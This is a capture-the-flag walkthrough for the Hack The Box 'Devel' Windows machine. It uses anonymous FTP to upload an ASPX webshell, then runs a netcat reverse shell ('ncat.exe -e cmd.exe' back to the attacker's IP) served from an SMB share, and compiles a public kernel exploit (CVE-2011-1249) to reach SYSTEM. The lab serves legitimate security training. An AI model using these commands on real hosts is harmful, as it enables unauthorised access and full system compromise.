HTB — Devel (without Metasploit)

This is an easy Windows box released back in March 2017, we’re going to own this box without the use of Metasploit.

Recon & Initial foothold :

We start with running nmap or my preferred method of using AutoRecon to save us some time.

AutoRecon speeds up the process significantly

From a quick glance GoBuster wasn’t able to run, so that may be worth re-running manually. For now we can see that there are two ports open, 21 and 80. This tells us that the host has FTP and HTTP servers running.

Let’s see what’s running on port 80 first. (AutoRecon also takes a screenshot for us, this can be found in the scans directory it creates)

IIS 7.5 Server from the looks of it

Let’s check out port 21 now, from the nmap scan results we can see that Anonymous login is allowed. The real question now is can we upload/download data as an Anonymous user?

The answer is yes to both, we have download and upload capability

The file we uploaded is a ASPX webshell that is included with Kali at /usr/share/webshells/aspx/cmdasp.aspx

Let’s see what happens when we navigate to /cmdasp.aspx

Success! We have a shell on the webserver now

Pivot from webshell :

We’re going to access nc.exe over SMB from this webshell so we can grab a proper reverse shell. To do so we’ll go the easy route and use smbserver.py from the Impacket project. I use pipx to manage my Python modules, so in my case I just need to run the following:

sudo smbserver.py <SHARE_NAME> <path to dir with ncat.exe>

Command to start the SMB server and the directory with ncat.exe

Now that we have our SMB server up, let’s use ncat.exe to spawn a shell. First start a listening on your Kali box with the tried and true, nc -lvnp <PORT>, and from the webshell we run the following:

\\<KALI_IP>\<SHARE_NAME>\ncat.exe -e cmd.exe <KALI_IP> <PORT>

Kicking off the shell
In the words of John McClane “Now I have a reverse shell HO-HO-HO”

Let’s find out some more info about the host and see what users exist.

What we’ve learned here is that this is a 32-bit Windows 7 system that appears to have no patches installed.

Sadly we can’t access the Administrator or babis user directories, so we’ll have to escalate our privilege to explore more.

Privilege Escalation :

For this host let’s save the output of systeminfo to a text file on our Kali box and then run WES-NG on that output to find some vulnerabilities we can exploit.

I ran the following to output the findings into a text file I can refer back to without having to scroll around my terminal

python wes.py <PATH_TO_SYSTEMINFO_FILE> > <OUTPUT_FOLDER_AND_FILE_NAME>

In the case of this host, we’re given a file with ~2500 lines, so we can search for privilege escalation vulns and do some research on them. There are multiple ways to escalate, however I liked the simplicity of CVE-2011–1249 here.

Back on the Kali box we’ll need to install a new tool, mingw-w64, run the following:

sudo apt install mingw-w64

Then download this exploit code or use searchsploit to make a local copy.

Next, in the directory with the exploit code run the following to create an executable file

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

You know the drill by now, we’re going to run this executable from our SMB share and get system privilege in one fell swoop.

whoami? I am system

Get the flags :

From here we can visit both the Administrator and babis user directories and grab the flags.